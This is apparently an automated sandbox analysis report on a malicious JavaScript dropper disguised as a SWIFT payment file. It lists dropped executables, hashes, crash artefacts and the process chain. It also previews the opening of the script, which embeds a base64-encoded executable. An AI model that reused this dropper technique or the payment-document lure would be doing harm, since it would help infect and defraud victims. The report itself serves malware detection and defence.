Preview:	MDMP....... ..........c.........................................,..........T.......8...........T...........(....\|..........0................................................................................U...........B..............GenuineIntelW...........T..............c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER7478.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8336
Entropy (8bit):	3.6910587723774455
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNiD463B6YqxSUqm7gmfMSkHCprd89bVlsfqJnm:RrlsNic6x6YcSUV7gmfMS8V+fqk
MD5:	8D7359AA25CE7203E7CADD43D8EB3710
SHA1:	25243FAD639B8363D6D1BFD2E5076EDD1661A5E3
SHA-256:	A5C6659A6F2EB21F5386ECFB7901B4B153970032376C0BBDF0761402890FD98F
SHA-512:	C642C2AF91BBF7BFE441B2E1F56373CC3F148068F5A087594C7D27639128CC21729D06E2C15B4D5E80504CE6BD52BC6E607AF20BF23D9C4C57430081D6115D32
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.4.6.1.2.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER74E7.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4643
Entropy (8bit):	4.414107065142114
Encrypted:	false
SSDEEP:	48:cvIwSD8zsTiJgtWI9H/Wgc8sqYjw8fm8M4JohIFYe+q8vehhotrLWd:uITfMQugrsqYxJileKc2ZLWd
MD5:	BC26F11846D6FC8645CC11118B6AC3B3
SHA1:	754C5B11E24EF905731BA53CD5C84C20D4BA51A7
SHA-256:	96E77F862F1A24895AAEABF39292E65DD04F03CC5791BEF0D1863F794903DBA8
SHA-512:	6A3DEC5FE543EA6F9B4B6DD2331810FE5FE4560F0BB0891F6BD0E22A9DE381CE442358A0F3B406E26E91DA346E8601978A66E64694E7063F97992B71B4A67DB5
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1895388" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\ProgramData\Microsoft\Windows\WER\Temp\WER932B.tmp.dmp

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	Mini DuMP crash report, 14 streams, Thu Feb 2 20:37:39 2023, 0x1205a4 type
Category:	dropped
Size (bytes):	43692
Entropy (8bit):	2.044994478573538
Encrypted:	false
SSDEEP:	192:606QhCBnQrSUdV3Oz4IWe+TcS3m6VXiMdDWIhNLZm98I+4n:1lSsQz9L+TRVNgE1Zgh
MD5:	92C9FA95B2F397E2052EF5CA665542A6
SHA1:	4841EDB0B141C7B443B4C8B4DC7758DB5B720D3E
SHA-256:	CF82D898C6662CE9DA9618DCC238E46A88CAD68DAAD53E24100BB28E4896D7A4
SHA-512:	976E0A74D47F12D29276E4F985CCD5FF0B49FEF4C17EDE73EB55F9CAF3F29635F5014E54D4F4C80DEFE77E3918A23BA999C2D8B10CEBBF82711EC0D99800E24C
Malicious:	false
Preview:	MDMP....... ..........c........................(...............T/..........T.......8...........T............................................................................................................U...........B......x.......GenuineIntelW...........T..............c............................. ..................P.a.c.i.f.i.c. .S.t.a.n.d.a.r.d. .T.i.m.e...........................................P.a.c.i.f.i.c. .D.a.y.l.i.g.h.t. .T.i.m.e...........................................1.7.1.3.4...1...x.8.6.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.....................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\ProgramData\Microsoft\Windows\WER\Temp\WER94E1.tmp.WERInternalMetadata.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, Unicode text, UTF-16, little-endian text, with CRLF line terminators
Category:	dropped
Size (bytes):	8332
Entropy (8bit):	3.6902966098775996
Encrypted:	false
SSDEEP:	192:Rrl7r3GLNizK6CI6YqeSUzngmfMSkHCprr89bdvsfjf/m:RrlsNie6N6YDSUzngmfMSqdUfj2
MD5:	146F95256EE9D4E81120E31D4902547E
SHA1:	105BC1B791E38777E3B8C110F3AF14703C555895
SHA-256:	DFA81926326028BF6599E9B2956AB19C1B7918334173B8C876267CC40AE19E72
SHA-512:	37DFE72B0CF3AEC3AEEF0C5873DCF74D86627ABE18D550AE6FFEB1C1C0B1795CC9D403024F1B9B41841DEEC6C751625F4F883046D0D1E144B62BCEE31F281221
Malicious:	false
Preview:	..<.?.x.m.l. .v.e.r.s.i.o.n.=.".1...0.". .e.n.c.o.d.i.n.g.=.".U.T.F.-.1.6.".?.>.....<.W.E.R.R.e.p.o.r.t.M.e.t.a.d.a.t.a.>.......<.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.........<.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.1.0...0.<./.W.i.n.d.o.w.s.N.T.V.e.r.s.i.o.n.>.........<.B.u.i.l.d.>.1.7.1.3.4.<./.B.u.i.l.d.>.........<.P.r.o.d.u.c.t.>.(.0.x.3.0.).:. .W.i.n.d.o.w.s. .1.0. .P.r.o.<./.P.r.o.d.u.c.t.>.........<.E.d.i.t.i.o.n.>.P.r.o.f.e.s.s.i.o.n.a.l.<./.E.d.i.t.i.o.n.>.........<.B.u.i.l.d.S.t.r.i.n.g.>.1.7.1.3.4...1...a.m.d.6.4.f.r.e...r.s.4._.r.e.l.e.a.s.e...1.8.0.4.1.0.-.1.8.0.4.<./.B.u.i.l.d.S.t.r.i.n.g.>.........<.R.e.v.i.s.i.o.n.>.1.<./.R.e.v.i.s.i.o.n.>.........<.F.l.a.v.o.r.>.M.u.l.t.i.p.r.o.c.e.s.s.o.r. .F.r.e.e.<./.F.l.a.v.o.r.>.........<.A.r.c.h.i.t.e.c.t.u.r.e.>.X.6.4.<./.A.r.c.h.i.t.e.c.t.u.r.e.>.........<.L.C.I.D.>.1.0.3.3.<./.L.C.I.D.>.......<./.O.S.V.e.r.s.i.o.n.I.n.f.o.r.m.a.t.i.o.n.>.......<.P.r.o.c.e.s.s.I.n.f.o.r.m.a.t.i.o.n.>.........<.P.i.d.>.1.8.0.8.<./.P.i.d.>.......

C:\ProgramData\Microsoft\Windows\WER\Temp\WER9550.tmp.xml

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	XML 1.0 document, ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	4643
Entropy (8bit):	4.415251827162205
Encrypted:	false
SSDEEP:	48:cvIwSD8zsTiJgtWI9H/Wgc8sqYj+8fm8M4JohIFaS+q8vehDkQtrLqd:uITfMQugrsqYnJi7SKcDkQZLqd
MD5:	BAAD75B486A4F400F2D8A120D8B81F80
SHA1:	66009D86920D49536999163DF61DF2FC538A15F3
SHA-256:	631029B816E0A70FFC52C90CD53E668B50F187E1DDBD68D2B0ECD164A6C9ABA5
SHA-512:	A40C1E7C02507D15D338E90F68670C0618EF8A5D3D31026C680ACEE75A3AD23F1E859517ECEA039886A9C23CE0E0C925957ED6BCD65DEB10A806F0FFDB2C96FB
Malicious:	false
Preview:	<?xml version="1.0" encoding="UTF-8" standalone="yes"?>..<req ver="2">.. <tlm>.. <src>.. <desc>.. <mach>.. <os>.. <arg nm="vermaj" val="10" />.. <arg nm="vermin" val="0" />.. <arg nm="verbld" val="17134" />.. <arg nm="vercsdbld" val="1" />.. <arg nm="verqfe" val="1" />.. <arg nm="csdbld" val="1" />.. <arg nm="versp" val="0" />.. <arg nm="arch" val="9" />.. <arg nm="lcid" val="1033" />.. <arg nm="geoid" val="244" />.. <arg nm="sku" val="48" />.. <arg nm="domain" val="0" />.. <arg nm="prodsuite" val="256" />.. <arg nm="ntprodtype" val="1" />.. <arg nm="platid" val="2" />.. <arg nm="tmsi" val="1895388" />.. <arg nm="osinsty" val="1" />.. <arg nm="iever" val="11.1.17134.0-11.0.47" />.. <arg nm="portos" val="0" />.. <arg nm="ram" val="4096" />..

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\fdqkbs.exe.log

Download File

Process:	C:\Users\user\AppData\Local\Temp\fdqkbs.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	1216
Entropy (8bit):	5.355304211458859
Encrypted:	false
SSDEEP:	24:MLUE4K5E4Ks2E1qE4x84qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4j:MIHK5HKXE1qHxviYHKhQnoPtHoxHhAHY
MD5:	69206D3AF7D6EFD08F4B4726998856D3
SHA1:	E778D4BF781F7712163CF5E2F5E7C15953E484CF
SHA-256:	A937AD22F9C3E667A062BA0E116672960CD93522F6997C77C00370755929BA87
SHA-512:	CD270C3DF75E548C9B0727F13F44F45262BD474336E89AAEBE56FABFE8076CD4638F88D3C0837B67C2EB3C54055679B07E4212FB3FEDBF88C015EB5DBBCD7FF8
Malicious:	true
Preview:	1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..2,"Microsoft.VisualBasic, Version=10.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a

C:\Users\user\AppData\Local\Temp\cdbnwuwdrt.r

Download File

Process:	C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe
File Type:	data
Category:	dropped
Size (bytes):	237374
Entropy (8bit):	7.998112883112987
Encrypted:	true
SSDEEP:	6144:jF29qcPaB7ksLg83//JcHWCIi1k7kcUwgoLv4:jF29bPaB7N3//Jc2CIMk7MZQ4
MD5:	1A93967010DDDAC93DCA6397716DD4BE
SHA1:	31C59D05490DDFBA29CE06FFD440C4530507CDB8
SHA-256:	53C3AED5183A52363131BD0857EB8CFA3FF553C8D84147C7CF5C7B0979B87C8D
SHA-512:	41AACC9988E4FDD151576FCD0ACB94144D1C7834B693E5795166BCF6B742AED4F74BB441F54D1EC56EFA16CC5DC8DABB95D2D35049375CEC1D83CC9D030653BF
Malicious:	false
Preview:	OD...Q0..Tt{H.........RI.F../C..5....U........7.J..0......^Y.u.B..h.:.>..K.8...4.}M9....1...v..Z>.....T=m....'..%....B..H......Xp.G....D..@..\|.....K...u.....n^q.....].0~...L=..H@FRU...#q.%.?s2.....LV.=`.>......KH.o.&.........+J......`.A=..rM..e...Q0.J;t{Ji.p....RI.F..7C^."1.h..f......K....J.....e...YqC.BBl...&...r..9..5...n.J....D{...J.........=J..2..p...q..H.M...IoMP..T...H.Oz#.A.....n.. ..O.....:U.......c.\v.......i.Y%.6#..V.u.6.c,.S3.....?O.....%..[....B.#%,fT$.\.Y.suA=..rM..P....Q0.d.`{i)..E.....RI.F../C..5....U....@H.....J........^Yq).BB3..k&..Y.r.t.....R.J....D.W.K....G.=J...sA.....B..H.M...IoM.%b.....H.z..A.....n.. ..O.....:U.......c.\v.......i.Y%.6#..V.u.6.c,BO..a...?O.....%..[....B.#%,fT$.\.Y.suA=..rM..e...Q0.dTt{i$..E.....RI.F../C..5....U........7.J..0.....^Yq).BB3..k&...r..9..5.....J....D{..WJ.....G.=J...2A.p...B..H.M...IoM.%b.....H.z..A.....n.. ..O.....:U.......c.\v.......i.Y%.6#..V.u.6.c,BO..a...?O.o8V.y.....<.

C:\Users\user\AppData\Local\Temp\fdqkbs.exe

Download File

Process:	C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	6.350070782699365
Encrypted:	false
SSDEEP:	1536:w/9cI7eE+7q3xJ6qI8ZZ9kmQFo4EFFWD3gjn5LIP/El3:w/9cIWcxTZ3km34EFkO8El3
MD5:	34037A20C292EAB6F90C3D9AB1334348
SHA1:	59EDE22E2E47E15AEB41C1DBA8B0CD1A6692693B
SHA-256:	A76B648B8D831810B5C0A1F0F9C4A4F67809679C12429DC7E576CE45B6CD1AAF
SHA-512:	CBB0DB98BA8D3C615E79358AEA82809FD28C41254AEF929DF7921FB025646006FA160AA8E25F52B75481F2054EABEF0B869647403016C2B9C998081028660B9E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Oe8%..Vv..Vv..Vvdr.v+.Vvdr.v..Vv.\|.v..Vv..Wv..Vvdr.v\|.Vvdr.v..VvRich..Vv........................PE..L......c.....................v.......3............@..........................................................................#.......................................................................................................................text...J........................... ..`.rdata...1.......2..................@..@.data....B...@......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\nse2F03.tmp

Download File

Process:	C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe
File Type:	data
Category:	dropped
Size (bytes):	333839
Entropy (8bit):	7.717717332714017
Encrypted:	false
SSDEEP:	6144:RF29qcPaB7ksLg83//JcHWCIi1k7kcUwgoLvtnBkizxTZUm9FTvl:RF29bPaB7N3//Jc2CIMk7MZQpB/zxTSu
MD5:	AB0658A8B410A38974A8D603B6C7ADAE
SHA1:	B0CC2CBB0968D7DD74DBB48A1A895B0F1B4FE070
SHA-256:	CAE2738F0D77621B31067C4A94ED2912DF7BBD5EE410D9BFB9F9B126BB592DCA
SHA-512:	761DEF1B30DA10EB2B7EBF3EF781911F57E3A58811B688061E823BB6098423BB4D32E06360205559E814AAC71D628A89843670335B5C835C0862A57C10AA6136
Malicious:	false
Preview:	.-......,...................k............,.......-..............................................................................'...........................................................................................................................................................G...................j...............................................................................................................................N...........>...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\rkgnewnhq.v

Download File

Process:	C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe
File Type:	data
Category:	dropped
Size (bytes):	7973
Entropy (8bit):	7.189921371635948
Encrypted:	false
SSDEEP:	192:darcitQvArWiPvsnb9JmKeVFlptFRbUJ4dLVWyduotC8MmLh:uCYrNPvsbWdVFfb44xViPTm9
MD5:	F12DC03CA4C7762CEB36825044F19D37
SHA1:	547877F2C2B1F91A68398E1E6B14A39E86133839
SHA-256:	98E4CEF3D032A40FF9DAF4C255B04F38C64FF5957CEC2D1C70D3E66C7FC8454B
SHA-512:	527DCBE916E633B03667DED10EE467AE53715C00DCBA759C438CAF6E7B434A92869C203BEDAA848012E5FF62851F18008302D49B27D1D963BFB354E4613B32F1
Malicious:	false
Preview:	.705m..f.F<...05o.:......?v>.3.3.<......M.knl.02a..c.E<...42c. ......4.D63.6.3.?.....E.gni.53P..805.p8.q?.2.8.u .a..beabo.H0..v..v.@3.`..i/7.p.6.t(2..g.}.u<..G-.0.3.h.f....w8L$.m.r.D;F...okc..m.;4.q.?.<@.4.0...m..u<f...@%.`4..D'd.O$..A5..=..<r..4M.knl.82a..Q..401ec.t4.M4...D;.D..d580..E9....E....3.u.mje.18e..`W..480.x<.p=.4.4.p-P..6.c.!....D%.\|.eX.....+..t..0....e.a..`beP..580.p=.t>.8.5.p,XE..Md.....M9..e...@4......F1..u.\|c.....Lq.}<...v<+480.}<;.&<.>..r.^.q8F0....q.^.q8F0...^..M...3uc.....}<F...kloe.=8e....aboZf`Z\V.v...`ZYaZCV.v.j^YV.}.lZAU.w.`Z\^.q.iY.T.}.m^.q.[WlT.}....i.W.y.R.}.^.y.W.q.......XW..Mc.....\7!.K.y.a..`.....Z...Jo.......\GB.Gg.u......X.B.Kg.v......Pp..Nd.w.....\...Ke.}.....Y...Ko.p......G8.u....0<..480fP.401Y7a^?X580..D;.g.....A4...Tgn.`...G.X0P0.80..3cg.a.p0..D.`...igen.a..@.b.e.kX.013^3gR7]804p.F8.a.c..q.ad.G<n.`..D2..qb.e...knj..o.00`...)ecXg`Z]^.q.iYXk^OV.}.lZPU.w.`ZE^.q.iY]T.}.mR.R.t.lT.}._\hR.t...R.}.^.y.W.y.R.u......ZR..Jo....\5$.O

C:\Users\user\AppData\Roaming\D06ED635-68F6-4E9A-955C-4899F5F57B9A\run.dat

Download File

Process:	C:\Users\user\AppData\Local\Temp\fdqkbs.exe
File Type:	International EBCDIC text, with no line terminators
Category:	dropped
Size (bytes):	8
Entropy (8bit):	2.75
Encrypted:	false
SSDEEP:	3:HG:HG
MD5:	60F71EE552914280296808616C64568F
SHA1:	D43B44FBB6053FD1C0C65082248C4AED87470FD5
SHA-256:	9765A68153B41503C331FDA996BEF7065635F5B3F9DF510710306B2FCC743DFF
SHA-512:	AFDCA863799D3CF995C44434DC6ACBD857589F1EC2406B3F2441A55CD9B02538AD078670960EDF3002575079483DEE7485836A704BFE93B1F5C555DA4147C6AE
Malicious:	true
Preview:	...H]..H

C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe

Download File

Process:	C:\Windows\System32\wscript.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
Category:	dropped
Size (bytes):	320087
Entropy (8bit):	7.933311892781397
Encrypted:	false
SSDEEP:	6144:/Ya60tuC5bG2DOeZGn19JzEVIOpxzF3SqqctwgYJ+LXtK:/YKt9bpOjnhotp9B9+giEXE
MD5:	E1EA8B4960D24E0E5742BBFCB3C0B240
SHA1:	4934275E71F844D2A8AD29C988DA11F09F3E255F
SHA-256:	3DDE7E20FF83EA53CBB96154F8CFF3CDA062E62F2BC377AC49D6695452E319AC
SHA-512:	8B3FD3EF831C942CD14EF3B9B0D943ECBA66B505F1A3E71AF47EBED6AD3B2B071FAEA0EA86F0D287138D4C3E27922D45EC5E37AB7C31BA041815271C62738DBE
Malicious:	true
Antivirus:	Antivirus: Joe Sandbox ML, Detection: 100%
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........1...Pf..Pf..Pf._9..Pf..Pg.LPf._;..Pf.sV..Pf..V`..Pf.Rich.Pf.........................PE..L.....Oa.................h...*......@6............@.......................................@..........................................................................................................................................................text...vf.......h.................. ..`.rdata...............l..............@..@.data...x...........................@....ndata...................................rsrc...............................@..@................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Roaming\tabgrjvojn\syhbwgs.exe

Download File

Process:	C:\Users\user\AppData\Local\Temp\fdqkbs.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	76800
Entropy (8bit):	6.350070782699365
Encrypted:	false
SSDEEP:	1536:w/9cI7eE+7q3xJ6qI8ZZ9kmQFo4EFFWD3gjn5LIP/El3:w/9cIWcxTZ3km34EFkO8El3
MD5:	34037A20C292EAB6F90C3D9AB1334348
SHA1:	59EDE22E2E47E15AEB41C1DBA8B0CD1A6692693B
SHA-256:	A76B648B8D831810B5C0A1F0F9C4A4F67809679C12429DC7E576CE45B6CD1AAF
SHA-512:	CBB0DB98BA8D3C615E79358AEA82809FD28C41254AEF929DF7921FB025646006FA160AA8E25F52B75481F2054EABEF0B869647403016C2B9C998081028660B9E
Malicious:	true
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......Oe8%..Vv..Vv..Vvdr.v+.Vvdr.v..Vv.\|.v..Vv..Wv..Vvdr.v\|.Vvdr.v..VvRich..Vv........................PE..L......c.....................v.......3............@..........................................................................#.......................................................................................................................text...J........................... ..`.rdata...1.......2..................@..@.data....B...@......................@...........................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1572864
Entropy (8bit):	4.290562845405301
Encrypted:	false
SSDEEP:	12288:bJirg2U4Q93X7IrDzT6o1Ka9oCOj3dsltOexPF4ue7NGupPxM/MMBf2+:9irg2U4Q93rIrDV80P60
MD5:	6838F4DD693AD09B90509872C2C8F420
SHA1:	82C2413D9EBDAF1C86AEF7822842AAD70EA42688
SHA-256:	31977ABB9C9AF47FE5017B3723060BBC20D937E2EA3CB31E4454BE93A2544094
SHA-512:	503367467335CD56F380E04D4E0D6E6B2BCA0BDB337214D2EFFE8BDE648C6405E34C16AF26791272FAD35B6CEBA9CE1E9DBAC472A187FA981F1AB0F3A1E5E9F8
Malicious:	false
Preview:	regf^...^...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.D"+F7................................................................................................................................................................................................................................................................................................................................................+v........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Windows\appcompat\Programs\Amcache.hve.LOG1

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	24576
Entropy (8bit):	3.728145926977052
Encrypted:	false
SSDEEP:	384:lS5/+ZllyBA+0W6mIpn88aTVgGFT+ZODvkZz4pWXSQlB:ls/+ZllGA+9S88AVgGpvDvTWt
MD5:	D2541961A4A21765E4E7EBE38573DAC2
SHA1:	567E5259771A672219405E7CDC4B5194346510EF
SHA-256:	48BBF28E868C85C59D0EF72F3F225431D12127FD18AB7574EBA4DC30B2F7846A
SHA-512:	74109C63BA0B757C853E9FF333226D80BDAD0051D38232976CD5A3E74D2A910B3A6D3C5785F4C37DE25D6D4873CE53AB772A506454785F0A25BF3687E7D950E7
Malicious:	false
Preview:	regf]...]...p.\..,.................. ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e...4............E.4............E.....5............E.rmtm.D"+F7................................................................................................................................................................................................................................................................................................................................................+vHvLE.^......]..............Pa......6..8N............................. ..hbin................p.\..,..........nk,./.$+F7.................................. ...........................&...{ad79c032-a2ea-f756-e377-72fb9332c3ae}......nk ./.$+F7...... ........................... .......Z.......................Root........lf......Root....nk ./.$+F7...................}.............. ...............*...............DeviceCensus........................vk..................WritePermissionsCheck...

Static File Info

General

File type:	ASCII text, with very long lines (65536), with no line terminators
Entropy (8bit):	5.984009951816934
TrID:
File name:	SWIFT MO104978172_1301 EURO 9700.js
File size:	427766
MD5:	0d6f726c3c2a4f6e82f0ede90ba88155
SHA1:	668eb996c241e10fb19c3a6ae5024309470be171
SHA256:	658c78c61ac43dc28e128cd71060b2c5ab03ed241cbcd32c5a0f5a09f081a574
SHA512:	ed0911a59d532ef9012abcd2ef27e963a19ae6d8b352e60208857b7ff038b2ed940e8bcdede67f4255674e4a6b8921740241a53c79cbb784437e1be3d68ba063
SSDEEP:	6144:BKWuoMfFEsrEGwfIWcvAoQlZPDhPvFPbr7zrdvBDHp+Nwsk/USGrtfy0nt:BKlV3EbqApDhPvFHDJ+NwpBort
TLSH:	7C9412BEC91E8EC62B3D19E5B0682C162E5C4ED7563A42F0FD48504771FF210E9A6CB9
File Content Preview:	try{String.prototype.endsWith = function(needle){.var emp = this.substr(this.length - needle.length);.return emp == needle;};var aso_ibora = "TVqQAAMAAAAEAAAA//8AALgAAAAAAAAAQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA2AAAAA4fug4AtAnNIbgBTM0hVGhpcyBwc

File Icon


Icon Hash:	e8d69ece968a9ec4

Network Behavior

Report size exceeds maximum size, go to the download page of this report and download PCAP to see all network behavior.

Statistics

CPU Usage

Click to jump to process

Memory Usage

Click to jump to process

High Level Behavior Distribution

Click to dive into process behavior distribution

Behavior

Click to jump to process

System Behavior

Analysis Process: wscript.exePID: 5140, Parent PID: 3452

General

Target ID:	0
Start time:	12:37:10
Start date:	02/02/2023
Path:	C:\Windows\System32\wscript.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\SWIFT MO104978172_1301 EURO 9700.js"
Imagebase:	0x7ff72f120000
File size:	163840 bytes
MD5 hash:	9A68ADD12EB50DDE7586782C3EB9FF9C
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high

Show Windows behavior

Chronological Activities

Analysis Process: SWIFT MO104978172_1301 EURO 9700.exePID: 3396, Parent PID: 5140

General

Target ID:	1
Start time:	12:37:13
Start date:	02/02/2023
Path:	C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\SWIFT MO104978172_1301 EURO 9700.exe"
Imagebase:	0x400000
File size:	320087 bytes
MD5 hash:	E1EA8B4960D24E0E5742BBFCB3C0B240
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Antivirus matches:	Detection: 100%, Joe Sandbox ML
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: fdqkbs.exePID: 1368, Parent PID: 3396

General

Target ID:	2
Start time:	12:37:13
Start date:	02/02/2023
Path:	C:\Users\user\AppData\Local\Temp\fdqkbs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Local\Temp\fdqkbs.exe" C:\Users\user\AppData\Local\Temp\rkgnewnhq.v
Imagebase:	0x400000
File size:	76800 bytes
MD5 hash:	34037A20C292EAB6F90C3D9AB1334348
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low

Show Windows behavior

Chronological Activities

Analysis Process: fdqkbs.exePID: 5336, Parent PID: 1368

General

Target ID:	3
Start time:	12:37:15
Start date:	02/02/2023
Path:	C:\Users\user\AppData\Local\Temp\fdqkbs.exe
Wow64 process (32bit):	true
Commandline:	C:\Users\user\AppData\Local\Temp\fdqkbs.exe
Imagebase:	0x400000
File size:	76800 bytes
MD5 hash:	34037A20C292EAB6F90C3D9AB1334348
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	.Net C# or VB.NET
